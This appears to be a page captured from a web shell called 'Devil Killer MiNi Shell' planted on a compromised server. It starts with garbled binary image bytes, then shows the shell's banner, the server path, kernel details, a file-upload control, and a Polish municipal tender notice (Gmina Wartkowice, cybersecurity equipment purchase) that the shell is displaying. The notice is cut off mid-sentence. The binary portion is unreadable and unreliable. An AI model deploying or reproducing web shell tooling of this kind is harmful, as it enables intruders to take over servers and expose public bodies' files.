JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251009/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251009/0046701601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP SPRZĘTU W RAMACH PROJEKTU &#34;CYBERBEZPIECZNY SAMORZĄD&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA WARTKOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934364</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Targowa 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wartkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">436785105</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@wartkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.wartkowice.biuletyn.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP SPRZĘTU W RAMACH PROJEKTU &#34;CYBERBEZPIECZNY SAMORZĄD&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6f37dbbc-7c2b-464e-adbf-47da7dcc131d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00467016</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00041601/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup sprzętu w ramach projektu &#34; Cyberbezpieczny samorząd&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt grantowy „Cyberbezpieczny Samorząd” o numerze FERC.02.02-CS.01-001/23 współfinansowany z Funduszy Europejskich na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2 - Wzmocnienie krajowego systemu cyberbezpieczeństwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6f37dbbc-7c2b-464e-adbf-47da7dcc131d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-6f37dbbc-7c2b-464e-adbf-47da7dcc131d</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e- Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl (https://ezamowienia.gov.pl/pl/regulamin/#regulamin- serwisu ) oraz informacje zamieszczone w zakładce „Centrum Pomocy” (https://ezamowienia.gov.pl/pl/komponent-edukacyjny/ ).<br/>2. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Dokumenty elektroniczne w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych tych danych i przekazuje się jako załączniki. Zamawiający rekomenduje, ażeby ofertę sporządzić w formacie danych pdf. Dopuszcza się także złożenie oferty skompresowanej w formacie .RAR;<br/>4. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy p.z.p, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej.<br/>6. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio<br/>oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>7. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „DODAJ ZAŁĄCZNIK”).<br/>8. W przypadku załączników, które są zgodnie z ustawą p.z.p lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólni ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB.<br/>10. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia i j.w. w SWZ Rozdział X.<br/>11. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny realizowany w ROZDZIALE XXV SWZ - w treści m.in.:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Gmina Wartkowice, ul. Targowa 25, 99-220 Wartkowice, reprezentowana<br/>przez Wójta Gminy; tel. 43 / 678-51-05;<br/>1.2. Gmina Wartkowice wyznaczyła Inspektora Ochrony Danych, Magdaleną Kuszmider, kontakt pisemny za pomocą poczty tradycyjnej na adres: Urząd Gminy Wartkowice, ul. Targowa 25, 99-220 Wartkowice; e-mail: kontakt@iszd.pl ;<br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na podstawie zgody wyrażonej poprzez złożenie oferty w postępowaniu nr ZP.271.08.2025 oraz:<br/>1.3.1. 3.1. art. 6 ust. 1 lit. c RODO, gdyż jest to niezbędne do wypełnienia obowiązku prawnego ciążącego na UZP, wynikającego min. z przepisów ustawy Prawo zamówień publicznych (Pzp) oraz aktów wykonawczych, a także ustawy o narodowym zasobie archiwalnym i archiwach, a w przypadku podpisania umowy lub zlecenia wykonania zamówienia, również na podstawie ordynacji podatkowej oraz przepisów rachunkowo – księgowych,<br/>1.3.2. art. 6 ust. 1 lit. b RODO, gdyż jest to niezbędne do podjęcia działań przed zawarciem umowy oraz do wykonania umowy;<br/>1.3.3. art. 6 ust. 1 lit. f RODO, ze względu na uzasadnione interesy UZP, w szczególności w celu ustalenia, obrony oraz dochodzenia roszczeń.<br/>1.4. Przetwarzaniu podlegają:<br/>1.4.1. dane kontaktowe oraz inne niezbędne do udziału w postępowaniu oraz podpisania i realizacji umowy;<br/>1.4.2. dane zawarte w dokumentach potwierdzających uprawnienia lub doświadczenie.<br/>1.4.3. dane pozyskane bezpośrednio od Wykonawcy, jak i ze źródeł publicznie dostępnych, tj. KRS, CEiDG, strony internetowe, itp.<br/>1.5. Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach p.z.p. związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego lub realizacją umowy. Konsekwencje niepodania danych osobowych wynikają z p.z.p..<br/>1.6. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 oraz 4 p.z.p., przy czym udostepnieniu nie podlegają dane osobowe, o których mowa w art. 9 ust. 1 RODO, zebrane w toku postępowania o udzielenie zamówienia.<br/>1.7. Pani/Pana dane osobowe będą przechowywane zgodnie z art. 78 ust. 1 p.z.p. przez okres co najmniej 4 lat liczonych od dnia zakończenia postępowania o udzielenie zamówienia publicznego albo do upływu terminu możliwości kontroli projektu współfinansowanego lub finansowanego ze środków Unii Europejskiej albo jego trwałości projektu bądź innych umów czy zobowiązań wynikających z realizowanych projektów. <br/>1.8. Posiada Pani/Pan prawo do:<br/>1.8.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>1.8.2. na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postepowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>1.8.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>1.8.4. wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych na niezgodne z RODO przetwarzanie Państwa danych osobowych przez Administratora. Prezes Urzędu Ochrony Danych Osobowych (PUODO) ul. Stawki 2, 00-193 Warszawa (zgodnie z art. 77 RODO);<br/>1.8.5. skorzystania ze środków ochrony prawnej przed właściwym sądem.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek informacyjny realizowany w ROZDZIALE XXV SWZ<br/>W tym m.in.:<br/>1.9. Nie przysługuje Pani/Panu prawo do:<br/>1.9.1. w zw. z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych,<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>1.9.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) w zw. z art. 21 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.08.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa urządzeń i oprogramowania na potrzeby Urzędu Gminy Wartkowice w ramach zadania realizowanego w związku z umową o powierzenie grantu w ramach Projektu grantowego „Cyberbezpieczny Samorząd” o numerze FERC.02.02-CS.01-001/23 współfinansowanego z Funduszy Europejskich na Rozwój Cyfrowy 2021-2027 (FERC), Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2 - Wzmocnienie krajowego systemu cyberbezpieczeństwa.<br/><br/>2.	Zamawiający w ramach przedmiotowego zamówienia wymaga sprzedaży i dostarczenia urządzeń i oprogramowania, udzielenia przez Wykonawcę gwarancji i zapewnienia w jej ramach serwisu gwarancyjnego, jak również dostarczenia przez Wykonawcę dokumentacji dostarczonego sprzętu i oprogramowania na etapie odbiorów ilościowych i jakościowych - zgodnie z wymaganiami Opisu Przedmiotu Zamówienia (OPZ) zawartymi w Załączniku nr 8 do SWZ oraz sposobem realizacji zamówienia opisanym w wzorze umowy stanowiącym Załącznik nr 4 do SWZ.<br/><br/>3.	Przedmiotem zamówienia jest dostawa następujących urządzeń i oprogramowania:<br/>3.1.	serwer do wirtualizacji – w ilości 1 szt.,<br/>3.2.	switch zarządzalny– w ilości 1 szt.,<br/>3.3.	oprogramowanie do kopii bezpieczeństwa– w ilości 1 szt.,<br/>3.4.	oprogramowanie do wirtualizacji– w ilości 1 szt.,<br/>3.5.	macierz dyskowa – w ilości 1 szt.,<br/>3.6.	system operacyjny – w ilości 1 szt.,<br/><br/>4.	Wymaga się, aby oferowany serwer do wirtualizacji i macierz dyskowa zapewniały pełną interoperacyjność i możliwość zbudowania klastra z posiadanym przez Zamawiającego serwerem PowerEdge R750xs.<br/><br/>5.	Zamawiający wymaga, aby Wykonawca udzielił następujących okresów gwarancji na dostarczone:<br/>5.1.	serwer do wirtualizacji – 84 miesiące;<br/>5.2.	macierz dyskową – 84 miesiące;<br/>5.3.	swich zarządzalny – 24 miesiące.<br/>6.	Za datę rozpoczęcia okresu gwarancji jakości przyjmuje się datę podpisania protokołu odbioru techniczno- jakościowego przedmiotu zamówienia.<br/>7.	Udzielona gwarancja jakości nie wyłącza odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy wynikające z przepisów Kodeksu Cywilnego. <br/><br/>8.	Wykonawca zobowiązuje się do dostawy oprogramowania:<br/>8.1.	wolnych od wad prawnych w rozumieniu przepisów Ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (t.j. Dz. U. z 2025 r. poz. 24), <br/>8.2.	w najnowszych wersjach oferowanych przez ich producenta, <br/>8.3.	ze wsparciem opisanym w załączonym do niniejszej umowy OPZ,<br/>8.4.	wraz z dokumentacją użytkownika oraz administratora,<br/>8.5.	wraz z licencjami na okres 36 miesięcy dla oprogramowanie do wirtualizacji i do kopii bezpieczeństwa – licząc od dnia podpisania protokołu przekazania przedmiotu umowy,<br/>8.6.	zgodnych z wszelkimi wymogami Zamawiającego kryteriami i parametrami technicznymi przedstawionymi w Opisie Przedmiotu Zamówienia (dalej OPZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena oferty dokonywana będzie na podstawie przedłożonego Formularza Oferty – Załącznik nr 1 do SWZ i oświadczeń oraz innych dokumentów opisanych w SWZ. <br/>2.	Zamawiający dokona oceny tych ofert, które nie zostały odrzucone, na podstawie jednego kryterium oceny ofert: <br/>LP	NAZWA KRYTERIUM	WAGA<br/> (w %)<br/>1	CENA 100<br/><br/>3.	Do oceny poszczególnych ofert w zakresie kryterium CENA zostanie zastosowana metoda polegająca na przyznaniu przedstawionej poniżej ilości punktów za zaoferowanie w Formularzu Ofertowym przez Wykonawcę ceny ofertowej za wykonanie przedmiotu zamówienia. <br/>Punktacja w kryterium cena obliczana będzie wg wzoru: <br/><br/>Najniższa cena ofertowa <br/> ----------------------------------------------- x 100 x procentowe znaczenie tego kryterium, tj. 100 % <br/>Cena ofertowa ocenianej oferty <br/> <br/>Wykonawca może otrzymać w ramach niniejszego kryterium maksymalnie 100pkt. <br/><br/>4.	Zgodnie z artykułem 246 pkt 2 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych- Zamawiający zastosował kryterium ceny jako jedyne kryterium oceny ofert z uwagi na fakt, iż standardy jakościowe – parametry techniczne odnoszące się do wszystkich istotnych cech przedmiotu zamówienia zostały przez zamawiającego ściśle określone, żeby zapewnić taką samą jakość przedmiotu zamówienia w przypadku każdego wyłonionego w postępowaniu wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> (numeracja punktów jak w SWZ Rozdział VIII):<br/>2.	O udzielenie niniejszego zamówienia może ubiegać się Wykonawca, który spełnia następujące warunki udziału w postępowaniu dotyczące: <br/>2.1.	zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spienianie Wykonawca byłby zobowiązany wykazać w sposób szczególny; <br/> <br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów : <br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spienianie Wykonawca byłby zobowiązany wykazać w sposób szczególny; <br/> <br/>2.3.	sytuacji ekonomicznej lub finansowej: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spienianie Wykonawca byłby zobowiązany wykazać w sposób szczególny;<br/><br/>2.4.	zdolności technicznej lub zawodowej: <br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże należyte wykonanie, <br/>a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwóch dostaw, w ramach których zrealizowane zostały dostawy sprzętu serwerowego podnoszące poziom cyberbezpieczeństwa – każda o wartości minimum 200000,00 zł brutto (słownie: dwieście tysięcy złotych ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">(numeracja punktów jak wv ROZDZIALE IX SWZ)<br/>2.2.	W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału<br/>w postępowaniu: <br/>2.2.1.	oświadczenia Wykonawcy, w 